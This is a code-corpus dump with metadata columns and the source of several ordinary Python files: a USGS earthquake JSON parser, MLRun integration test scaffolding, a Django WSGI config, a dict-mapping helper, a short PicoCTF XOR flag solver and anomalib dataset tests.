hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c2c78f323d191615d8945cd2e3207743a075eb0 | 1,570 | py | Python | Ch5/jsondata_start.py | prottoyghose/python_essentials | 029e3208b4be343315d384b6f6a4d77eb25f9fcb | [
"Apache-2.0"
] | null | null | null | Ch5/jsondata_start.py | prottoyghose/python_essentials | 029e3208b4be343315d384b6f6a4d77eb25f9fcb | [
"Apache-2.0"
] | null | null | null | Ch5/jsondata_start.py | prottoyghose/python_essentials | 029e3208b4be343315d384b6f6a4d77eb25f9fcb | [
"Apache-2.0"
] | null | null | null | #
# Example file for parsing and processing JSON
#
import urllib.request
import json
def printResults(data):
# Use the json module to load the string data into a dictionary
theJSON = json.loads(data)
# now we can access the contents of the JSON like any other Python object
# if "title" in theJSON["metadata"]:
# print(theJSON["metadata"]["title"])
# output the number of events, plus the magnitude and each event name
# count = theJSON["metadata"]["count"]
# print(str(count) + " events recorded")
# for each event, print the place where it occurred
# for i in theJSON["features"]:
# print (i["properties"]["place"])
# print the events that only have a magnitude greater than 4
for i in theJSON["features"]:
if(i["properties"]["mag"] >= 4.0):
print("%2.1f" % i["properties"]["mag"], i["properties"]["place"])
print("--------------------\n")
# print only the events where at least 1 person reported feeling something
def main():
# define a variable to hold the source URL
# In this case we'll use the free data feed from the USGS
# This feed lists all earthquakes for the last day larger than Mag 2.5
urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
# Open the URL and read the data
webUrl = urllib.request.urlopen(urlData)
print ("result code: " + str(webUrl.getcode()))
if(webUrl.getcode()==200):
data = webUrl.read()
printResults(data)
else:
print("Receieved error, cannot parse results")
if __name__ == "__main__":
main()
| 30.784314 | 86 | 0.666879 |
import urllib.request
import json
def printResults(data):
theJSON = json.loads(data)
for i in theJSON["features"]:
if(i["properties"]["mag"] >= 4.0):
print("%2.1f" % i["properties"]["mag"], i["properties"]["place"])
print("--------------------\n")
def main():
# This feed lists all earthquakes for the last day larger than Mag 2.5
urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
# Open the URL and read the data
webUrl = urllib.request.urlopen(urlData)
print ("result code: " + str(webUrl.getcode()))
if(webUrl.getcode()==200):
data = webUrl.read()
printResults(data)
else:
print("Receieved error, cannot parse results")
if __name__ == "__main__":
main()
| true | true |
1c2c78ff440615a7440945f91e8b1bac0ee178b4 | 7,119 | py | Python | tests/integration/sdk_api/base.py | daniels290813/mlrun | c95d90c3b4ce78d9b71456333ccd201f932d60ea | [
"Apache-2.0"
] | null | null | null | tests/integration/sdk_api/base.py | daniels290813/mlrun | c95d90c3b4ce78d9b71456333ccd201f932d60ea | [
"Apache-2.0"
] | null | null | null | tests/integration/sdk_api/base.py | daniels290813/mlrun | c95d90c3b4ce78d9b71456333ccd201f932d60ea | [
"Apache-2.0"
] | null | null | null | import copy
import os
import pathlib
import subprocess
import sys
import pymysql
import mlrun
import mlrun.api.schemas
import tests.conftest
from mlrun.db.httpdb import HTTPRunDB
from mlrun.utils import create_logger, retry_until_successful
logger = create_logger(level="debug", name="test-integration")
class TestMLRunIntegration:
project_name = "system-test-project"
root_path = pathlib.Path(__file__).absolute().parent.parent.parent.parent
results_path = root_path / "tests" / "test_results" / "integration"
db_liveness_timeout = 30
db_host_internal = "host.docker.internal"
db_host_external = "localhost"
db_user = "root"
db_port = 3306
db_name = "mlrun"
db_dsn = f"mysql+pymysql://{db_user}@{db_host_internal}:{db_port}/{db_name}"
def setup_method(self, method):
self._logger = logger
self._logger.info(
f"Setting up test {self.__class__.__name__}::{method.__name__}"
)
self._run_db()
api_url = self._run_api()
self._test_env = {}
self._old_env = {}
self._setup_env({"MLRUN_DBPATH": api_url})
self.custom_setup()
self._logger.info(
f"Finished setting up test {self.__class__.__name__}::{method.__name__}"
)
def teardown_method(self, method):
self._logger.info(
f"Tearing down test {self.__class__.__name__}::{method.__name__}"
)
self.custom_teardown()
self._remove_api()
self._remove_db()
self._teardown_env()
self._logger.info(
f"Finished tearing down test {self.__class__.__name__}::{method.__name__}"
)
def custom_setup(self):
pass
def custom_teardown(self):
pass
@property
def assets_path(self):
return (
pathlib.Path(sys.modules[self.__module__].__file__).absolute().parent
/ "assets"
)
def _setup_env(self, env: dict):
self._logger.debug("Setting up test environment")
self._test_env.update(env)
# save old env vars for returning them on teardown
for env_var, value in env.items():
if env_var in os.environ:
self._old_env[env_var] = os.environ[env_var]
if value:
os.environ[env_var] = value
# reload the config so changes to the env vars will take affect
mlrun.config.config.reload()
def _teardown_env(self):
self._logger.debug("Tearing down test environment")
for env_var in self._test_env:
if env_var in os.environ:
del os.environ[env_var]
os.environ.update(self._old_env)
# reload the config so changes to the env vars will take affect
mlrun.config.config.reload()
def _run_db(self):
self._logger.debug("Starting DataBase")
self._run_command(
"make",
args=["run-test-db"],
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.db_container_id = output.strip()
self._logger.debug("Started DataBase", container_id=self.db_container_id)
self._ensure_database_liveness(timeout=self.db_liveness_timeout)
def _run_api(self):
self._logger.debug("Starting API")
self._run_command(
"make",
args=["run-api"],
env=self._extend_current_env(
{"MLRUN_VERSION": "test-integration", "MLRUN_HTTPDB__DSN": self.db_dsn}
),
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.api_container_id = output.strip()
# retrieve container bind port + host
output = self._run_command(
"docker", args=["port", self.api_container_id, "8080"]
)
# usually the output is something like '0.0.0.0:49154\n' but sometimes (in GH actions) it's something like
# '0.0.0.0:49154\n:::49154\n' for some reason, so just taking the first line
host = output.splitlines()[0]
url = f"http://{host}"
self._check_api_is_healthy(url)
self._logger.info(
"Successfully started API", url=url, container_id=self.api_container_id
)
return url
def _remove_api(self):
if self.api_container_id:
logs = self._run_command("docker", args=["logs", self.api_container_id])
self._logger.debug(
"Removing API container", container_id=self.api_container_id, logs=logs
)
self._run_command("docker", args=["rm", "--force", self.api_container_id])
def _remove_db(self):
if self.db_container_id:
logs = self._run_command("docker", args=["logs", self.db_container_id])
self._logger.debug(
"Removing Database container",
container_name=self.db_container_id,
logs=logs,
)
out = self._run_command(
"docker", args=["rm", "--force", self.db_container_id]
)
self._logger.debug(
"Removed Database container",
out=out,
)
def _ensure_database_liveness(self, retry_interval=2, timeout=30):
self._logger.debug("Ensuring database liveness")
retry_until_successful(
retry_interval,
timeout,
self._logger,
True,
pymysql.connect,
host=self.db_host_external,
user=self.db_user,
port=self.db_port,
database=self.db_name,
)
self._logger.debug("Database ready for connection")
@staticmethod
def _extend_current_env(env):
current_env = copy.deepcopy(os.environ)
current_env.update(env)
return current_env
@staticmethod
def _check_api_is_healthy(url):
health_url = f"{url}/{HTTPRunDB.get_api_path_prefix()}/healthz"
timeout = 30
if not tests.conftest.wait_for_server(health_url, timeout):
raise RuntimeError(f"API did not start after {timeout} sec")
@staticmethod
def _run_command(command, args=None, cwd=None, env=None):
if args:
command += " " + " ".join(args)
try:
process = subprocess.run(
command,
shell=True,
check=True,
capture_output=True,
encoding="utf-8",
cwd=cwd,
env=env,
)
except subprocess.CalledProcessError as exc:
logger.warning(
"Command failed",
stdout=exc.stdout,
stderr=exc.stderr,
return_code=exc.returncode,
cmd=exc.cmd,
env=env,
args=exc.args,
)
raise
output = process.stdout
return output
| 31.361233 | 114 | 0.580559 | import copy
import os
import pathlib
import subprocess
import sys
import pymysql
import mlrun
import mlrun.api.schemas
import tests.conftest
from mlrun.db.httpdb import HTTPRunDB
from mlrun.utils import create_logger, retry_until_successful
logger = create_logger(level="debug", name="test-integration")
class TestMLRunIntegration:
project_name = "system-test-project"
root_path = pathlib.Path(__file__).absolute().parent.parent.parent.parent
results_path = root_path / "tests" / "test_results" / "integration"
db_liveness_timeout = 30
db_host_internal = "host.docker.internal"
db_host_external = "localhost"
db_user = "root"
db_port = 3306
db_name = "mlrun"
db_dsn = f"mysql+pymysql://{db_user}@{db_host_internal}:{db_port}/{db_name}"
def setup_method(self, method):
self._logger = logger
self._logger.info(
f"Setting up test {self.__class__.__name__}::{method.__name__}"
)
self._run_db()
api_url = self._run_api()
self._test_env = {}
self._old_env = {}
self._setup_env({"MLRUN_DBPATH": api_url})
self.custom_setup()
self._logger.info(
f"Finished setting up test {self.__class__.__name__}::{method.__name__}"
)
def teardown_method(self, method):
self._logger.info(
f"Tearing down test {self.__class__.__name__}::{method.__name__}"
)
self.custom_teardown()
self._remove_api()
self._remove_db()
self._teardown_env()
self._logger.info(
f"Finished tearing down test {self.__class__.__name__}::{method.__name__}"
)
def custom_setup(self):
pass
def custom_teardown(self):
pass
@property
def assets_path(self):
return (
pathlib.Path(sys.modules[self.__module__].__file__).absolute().parent
/ "assets"
)
def _setup_env(self, env: dict):
self._logger.debug("Setting up test environment")
self._test_env.update(env)
for env_var, value in env.items():
if env_var in os.environ:
self._old_env[env_var] = os.environ[env_var]
if value:
os.environ[env_var] = value
mlrun.config.config.reload()
def _teardown_env(self):
self._logger.debug("Tearing down test environment")
for env_var in self._test_env:
if env_var in os.environ:
del os.environ[env_var]
os.environ.update(self._old_env)
mlrun.config.config.reload()
def _run_db(self):
self._logger.debug("Starting DataBase")
self._run_command(
"make",
args=["run-test-db"],
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.db_container_id = output.strip()
self._logger.debug("Started DataBase", container_id=self.db_container_id)
self._ensure_database_liveness(timeout=self.db_liveness_timeout)
def _run_api(self):
self._logger.debug("Starting API")
self._run_command(
"make",
args=["run-api"],
env=self._extend_current_env(
{"MLRUN_VERSION": "test-integration", "MLRUN_HTTPDB__DSN": self.db_dsn}
),
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.api_container_id = output.strip()
output = self._run_command(
"docker", args=["port", self.api_container_id, "8080"]
)
# '0.0.0.0:49154\n:::49154\n' for some reason, so just taking the first line
host = output.splitlines()[0]
url = f"http://{host}"
self._check_api_is_healthy(url)
self._logger.info(
"Successfully started API", url=url, container_id=self.api_container_id
)
return url
def _remove_api(self):
if self.api_container_id:
logs = self._run_command("docker", args=["logs", self.api_container_id])
self._logger.debug(
"Removing API container", container_id=self.api_container_id, logs=logs
)
self._run_command("docker", args=["rm", "--force", self.api_container_id])
def _remove_db(self):
if self.db_container_id:
logs = self._run_command("docker", args=["logs", self.db_container_id])
self._logger.debug(
"Removing Database container",
container_name=self.db_container_id,
logs=logs,
)
out = self._run_command(
"docker", args=["rm", "--force", self.db_container_id]
)
self._logger.debug(
"Removed Database container",
out=out,
)
def _ensure_database_liveness(self, retry_interval=2, timeout=30):
self._logger.debug("Ensuring database liveness")
retry_until_successful(
retry_interval,
timeout,
self._logger,
True,
pymysql.connect,
host=self.db_host_external,
user=self.db_user,
port=self.db_port,
database=self.db_name,
)
self._logger.debug("Database ready for connection")
@staticmethod
def _extend_current_env(env):
current_env = copy.deepcopy(os.environ)
current_env.update(env)
return current_env
@staticmethod
def _check_api_is_healthy(url):
health_url = f"{url}/{HTTPRunDB.get_api_path_prefix()}/healthz"
timeout = 30
if not tests.conftest.wait_for_server(health_url, timeout):
raise RuntimeError(f"API did not start after {timeout} sec")
@staticmethod
def _run_command(command, args=None, cwd=None, env=None):
if args:
command += " " + " ".join(args)
try:
process = subprocess.run(
command,
shell=True,
check=True,
capture_output=True,
encoding="utf-8",
cwd=cwd,
env=env,
)
except subprocess.CalledProcessError as exc:
logger.warning(
"Command failed",
stdout=exc.stdout,
stderr=exc.stderr,
return_code=exc.returncode,
cmd=exc.cmd,
env=env,
args=exc.args,
)
raise
output = process.stdout
return output
| true | true |
1c2c793926370a302016f44032ba3bdd72a3fa41 | 401 | py | Python | radon_server/wsgi.py | leo212/radon_transform | 04721c365d01e9b6a17eba4130a13d453844e27d | [
"Apache-2.0"
] | null | null | null | radon_server/wsgi.py | leo212/radon_transform | 04721c365d01e9b6a17eba4130a13d453844e27d | [
"Apache-2.0"
] | 2 | 2021-03-19T01:28:34.000Z | 2022-01-13T01:19:59.000Z | radon_server/wsgi.py | leo212/radon_transform | 04721c365d01e9b6a17eba4130a13d453844e27d | [
"Apache-2.0"
] | null | null | null | """
WSGI config for radon_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'radon_server.settings')
application = get_wsgi_application()
| 23.588235 | 78 | 0.790524 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'radon_server.settings')
application = get_wsgi_application()
| true | true |
1c2c7a20db73d48b38cdb71eedae1aceaf185ef0 | 667 | py | Python | application/utilities/dict_mapping.py | kelp404/Victory | 132f186f18ea6a709afb003e38ed1d6de3c0579f | [
"MIT"
] | 15 | 2015-02-15T16:40:19.000Z | 2021-02-01T21:31:26.000Z | application/utilities/dict_mapping.py | kelp404/Victory | 132f186f18ea6a709afb003e38ed1d6de3c0579f | [
"MIT"
] | null | null | null | application/utilities/dict_mapping.py | kelp404/Victory | 132f186f18ea6a709afb003e38ed1d6de3c0579f | [
"MIT"
] | 1 | 2015-06-02T07:48:30.000Z | 2015-06-02T07:48:30.000Z |
class DictMapping:
"""
Dictionary Mapping
copy all values in the dict object to the custom class instance.
"""
@staticmethod
def inject(strong, dic):
"""
copy all value in dic to strong
@param strong a custom class instance
@param dic a dict object
"""
if isinstance(dic, dict):
# dict object
for name in dir(strong):
try:
if name[:2] != '__' and name in dic:
setattr(strong, name, dic[name])
except: pass
else:
# class
DictMapping.inject(strong, dic.__dict__)
| 26.68 | 68 | 0.506747 |
class DictMapping:
@staticmethod
def inject(strong, dic):
if isinstance(dic, dict):
for name in dir(strong):
try:
if name[:2] != '__' and name in dic:
setattr(strong, name, dic[name])
except: pass
else:
DictMapping.inject(strong, dic.__dict__)
| true | true |
1c2c7a3489682f5b904e53760dcaba38a92ea875 | 82 | py | Python | n2survey/plot/__init__.py | N2-Survey/SurveyFramework | 8295fd9808c95db85befb1f60391460908a7d2b0 | [
"MIT"
] | 1 | 2022-01-26T19:04:38.000Z | 2022-01-26T19:04:38.000Z | n2survey/plot/__init__.py | N2-Survey/SurveyFramework | 8295fd9808c95db85befb1f60391460908a7d2b0 | [
"MIT"
] | 77 | 2021-09-14T09:33:03.000Z | 2022-03-31T18:02:47.000Z | n2survey/plot/__init__.py | N2-Survey/SurveyFramework | 8295fd9808c95db85befb1f60391460908a7d2b0 | [
"MIT"
] | 3 | 2021-09-14T20:11:28.000Z | 2021-12-26T11:56:25.000Z | from .bar import *
from .plot_likert import *
from .plot_multiple_choice import *
| 20.5 | 35 | 0.780488 | from .bar import *
from .plot_likert import *
from .plot_multiple_choice import *
| true | true |
1c2c7b901ddafeb5c8002732ecae960943849e2f | 279 | py | Python | PicoCTF 2018/Reversing/quackme/solve1.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 51 | 2018-06-26T09:49:42.000Z | 2019-09-14T00:06:35.000Z | PicoCTF 2018/Reversing/quackme/solve1.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 1 | 2018-06-29T18:40:59.000Z | 2018-07-09T20:29:41.000Z | PicoCTF 2018/Reversing/quackme/solve1.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 22 | 2019-10-03T14:52:43.000Z | 2022-01-17T08:55:10.000Z | #!/usr/bin/env python3
key = b"\x29\x06\x16\x4F\x2B\x35\x30\x1E\x51\x1B\x5B\x14\x4B\x08\x5D\x2B\x5C\x10\x06\x06\x18\x45\x51\x00\x5D"
cipher = b"You have now entered the Duck Web, and you're in for a honk"
flag = "".join(chr(k^c) for k,c in zip(key,cipher[:len(key)]))
print(flag) | 55.8 | 109 | 0.695341 |
key = b"\x29\x06\x16\x4F\x2B\x35\x30\x1E\x51\x1B\x5B\x14\x4B\x08\x5D\x2B\x5C\x10\x06\x06\x18\x45\x51\x00\x5D"
cipher = b"You have now entered the Duck Web, and you're in for a honk"
flag = "".join(chr(k^c) for k,c in zip(key,cipher[:len(key)]))
print(flag) | true | true |
1c2c7c7b409d735c707e4a4f5156d62ffa140283 | 8,243 | py | Python | tests/pre_merge/datasets/test_dataset.py | DavidHribek/anomalib | d8f6674bc4669fbad88cb61c235b1a2532ae44f5 | [
"Apache-2.0"
] | null | null | null | tests/pre_merge/datasets/test_dataset.py | DavidHribek/anomalib | d8f6674bc4669fbad88cb61c235b1a2532ae44f5 | [
"Apache-2.0"
] | null | null | null | tests/pre_merge/datasets/test_dataset.py | DavidHribek/anomalib | d8f6674bc4669fbad88cb61c235b1a2532ae44f5 | [
"Apache-2.0"
] | null | null | null | """Test Dataset."""
import os
import numpy as np
import pytest
from anomalib.config import get_configurable_parameters, update_input_size_config
from anomalib.data import (
BTechDataModule,
FolderDataModule,
MVTecDataModule,
get_datamodule,
)
from anomalib.pre_processing.transforms import Denormalize, ToNumpy
from tests.helpers.dataset import TestDataset, get_dataset_path
@pytest.fixture(autouse=True)
def mvtec_data_module():
datamodule = MVTecDataModule(
root=get_dataset_path(dataset="MVTec"),
category="leather",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def btech_data_module():
"""Create BTech Data Module."""
datamodule = BTechDataModule(
root=get_dataset_path(dataset="BTech"),
category="01",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def folder_data_module():
"""Create Folder Data Module."""
root = get_dataset_path(dataset="bottle")
datamodule = FolderDataModule(
root=root,
normal="good",
abnormal="broken_large",
mask_dir=os.path.join(root, "ground_truth/broken_large"),
task="segmentation",
split_ratio=0.2,
seed=0,
image_size=(256, 256),
train_batch_size=32,
test_batch_size=32,
num_workers=8,
create_validation_set=True,
)
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def data_sample(mvtec_data_module):
_, data = next(enumerate(mvtec_data_module.train_dataloader()))
return data
class TestMVTecDataModule:
"""Test MVTec AD Data Module."""
def test_batch_size(self, mvtec_data_module):
"""test_mvtec_datamodule [summary]"""
_, train_data_sample = next(enumerate(mvtec_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(mvtec_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, mvtec_data_module):
"""Test Validation and Test dataloaders should return filenames, image, mask and label."""
_, val_data = next(enumerate(mvtec_data_module.val_dataloader()))
_, test_data = next(enumerate(mvtec_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestBTechDataModule:
"""Test BTech Data Module."""
def test_batch_size(self, btech_data_module):
"""Test batch size."""
_, train_data_sample = next(enumerate(btech_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(btech_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, btech_data_module):
"""Test Validation and Test dataloaders should return filenames, image, mask and label."""
_, val_data = next(enumerate(btech_data_module.val_dataloader()))
_, test_data = next(enumerate(btech_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestFolderDataModule:
"""Test Folder Data Module."""
def test_batch_size(self, folder_data_module):
"""Test batch size."""
_, train_data_sample = next(enumerate(folder_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(folder_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 16
assert val_data_sample["image"].shape[0] == 12
def test_val_and_test_dataloaders_has_mask_and_gt(self, folder_data_module):
"""Test Validation and Test dataloaders should return filenames, image, mask and label."""
_, val_data = next(enumerate(folder_data_module.val_dataloader()))
_, test_data = next(enumerate(folder_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestDenormalize:
"""Test Denormalize Util."""
def test_denormalize_image_pixel_values(self, data_sample):
"""Test Denormalize denormalizes tensor into [0, 256] range."""
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert denormalized_sample.min() >= 0 and denormalized_sample.max() <= 256
def test_denormalize_return_numpy(self, data_sample):
"""Denormalize should return a numpy array."""
denormalized_sample = Denormalize()(data_sample["image"].squeeze())
assert isinstance(denormalized_sample, np.ndarray)
def test_denormalize_channel_order(self, data_sample):
"""Denormalize should return a numpy array of order [HxWxC]"""
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert len(denormalized_sample.shape) == 3 and denormalized_sample.shape[-1] == 3
def test_representation(self):
"""Test Denormalize representation should return string
Denormalize()"""
assert str(Denormalize()) == "Denormalize()"
class TestToNumpy:
"""Test ToNumpy whether it properly converts tensor into numpy array."""
def test_to_numpy_image_pixel_values(self, data_sample):
"""Test ToNumpy should return an array whose pixels in the range of [0,
256]"""
array = ToNumpy()(data_sample["image"])
assert array.min() >= 0 and array.max() <= 256
def test_to_numpy_converts_tensor_to_np_array(self, data_sample):
"""ToNumpy returns a numpy array."""
array = ToNumpy()(data_sample["image"])
assert isinstance(array, np.ndarray)
def test_to_numpy_channel_order(self, data_sample):
"""ToNumpy() should return a numpy array of order [HxWxC]"""
array = ToNumpy()(data_sample["image"])
assert len(array.shape) == 3 and array.shape[-1] == 3
def test_one_channel_images(self, data_sample):
"""One channel tensor should be converted to HxW np array."""
data = data_sample["image"][:, 0, :, :].unsqueeze(0)
array = ToNumpy()(data)
assert len(array.shape) == 2
def test_representation(self):
"""Test ToNumpy() representation should return string `ToNumpy()`"""
assert str(ToNumpy()) == "ToNumpy()"
class TestConfigToDataModule:
"""Tests that check if the dataset parameters in the config achieve the desired effect."""
@pytest.mark.parametrize(
["input_size", "effective_image_size"],
[
(512, (512, 512)),
((245, 276), (245, 276)),
((263, 134), (263, 134)),
((267, 267), (267, 267)),
],
)
@TestDataset(num_train=20, num_test=10)
def test_image_size(self, input_size, effective_image_size, category="shapes", path=""):
"""Test if the image size parameter works as expected."""
model_name = "stfpm"
configurable_parameters = get_configurable_parameters(model_name)
configurable_parameters.dataset.path = path
configurable_parameters.dataset.category = category
configurable_parameters.dataset.image_size = input_size
configurable_parameters = update_input_size_config(configurable_parameters)
data_module = get_datamodule(configurable_parameters)
data_module.setup()
assert iter(data_module.train_dataloader()).__next__()["image"].shape[-2:] == effective_image_size
| 37.986175 | 106 | 0.677787 |
import os
import numpy as np
import pytest
from anomalib.config import get_configurable_parameters, update_input_size_config
from anomalib.data import (
BTechDataModule,
FolderDataModule,
MVTecDataModule,
get_datamodule,
)
from anomalib.pre_processing.transforms import Denormalize, ToNumpy
from tests.helpers.dataset import TestDataset, get_dataset_path
@pytest.fixture(autouse=True)
def mvtec_data_module():
datamodule = MVTecDataModule(
root=get_dataset_path(dataset="MVTec"),
category="leather",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def btech_data_module():
datamodule = BTechDataModule(
root=get_dataset_path(dataset="BTech"),
category="01",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def folder_data_module():
root = get_dataset_path(dataset="bottle")
datamodule = FolderDataModule(
root=root,
normal="good",
abnormal="broken_large",
mask_dir=os.path.join(root, "ground_truth/broken_large"),
task="segmentation",
split_ratio=0.2,
seed=0,
image_size=(256, 256),
train_batch_size=32,
test_batch_size=32,
num_workers=8,
create_validation_set=True,
)
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def data_sample(mvtec_data_module):
_, data = next(enumerate(mvtec_data_module.train_dataloader()))
return data
class TestMVTecDataModule:
def test_batch_size(self, mvtec_data_module):
_, train_data_sample = next(enumerate(mvtec_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(mvtec_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, mvtec_data_module):
_, val_data = next(enumerate(mvtec_data_module.val_dataloader()))
_, test_data = next(enumerate(mvtec_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestBTechDataModule:
def test_batch_size(self, btech_data_module):
_, train_data_sample = next(enumerate(btech_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(btech_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, btech_data_module):
_, val_data = next(enumerate(btech_data_module.val_dataloader()))
_, test_data = next(enumerate(btech_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestFolderDataModule:
def test_batch_size(self, folder_data_module):
_, train_data_sample = next(enumerate(folder_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(folder_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 16
assert val_data_sample["image"].shape[0] == 12
def test_val_and_test_dataloaders_has_mask_and_gt(self, folder_data_module):
_, val_data = next(enumerate(folder_data_module.val_dataloader()))
_, test_data = next(enumerate(folder_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestDenormalize:
def test_denormalize_image_pixel_values(self, data_sample):
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert denormalized_sample.min() >= 0 and denormalized_sample.max() <= 256
def test_denormalize_return_numpy(self, data_sample):
denormalized_sample = Denormalize()(data_sample["image"].squeeze())
assert isinstance(denormalized_sample, np.ndarray)
def test_denormalize_channel_order(self, data_sample):
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert len(denormalized_sample.shape) == 3 and denormalized_sample.shape[-1] == 3
def test_representation(self):
assert str(Denormalize()) == "Denormalize()"
class TestToNumpy:
def test_to_numpy_image_pixel_values(self, data_sample):
array = ToNumpy()(data_sample["image"])
assert array.min() >= 0 and array.max() <= 256
def test_to_numpy_converts_tensor_to_np_array(self, data_sample):
array = ToNumpy()(data_sample["image"])
assert isinstance(array, np.ndarray)
def test_to_numpy_channel_order(self, data_sample):
array = ToNumpy()(data_sample["image"])
assert len(array.shape) == 3 and array.shape[-1] == 3
def test_one_channel_images(self, data_sample):
data = data_sample["image"][:, 0, :, :].unsqueeze(0)
array = ToNumpy()(data)
assert len(array.shape) == 2
def test_representation(self):
assert str(ToNumpy()) == "ToNumpy()"
class TestConfigToDataModule:
@pytest.mark.parametrize(
["input_size", "effective_image_size"],
[
(512, (512, 512)),
((245, 276), (245, 276)),
((263, 134), (263, 134)),
((267, 267), (267, 267)),
],
)
@TestDataset(num_train=20, num_test=10)
def test_image_size(self, input_size, effective_image_size, category="shapes", path=""):
model_name = "stfpm"
configurable_parameters = get_configurable_parameters(model_name)
configurable_parameters.dataset.path = path
configurable_parameters.dataset.category = category
configurable_parameters.dataset.image_size = input_size
configurable_parameters = update_input_size_config(configurable_parameters)
data_module = get_datamodule(configurable_parameters)
data_module.setup()
assert iter(data_module.train_dataloader()).__next__()["image"].shape[-2:] == effective_image_size
| true | true |
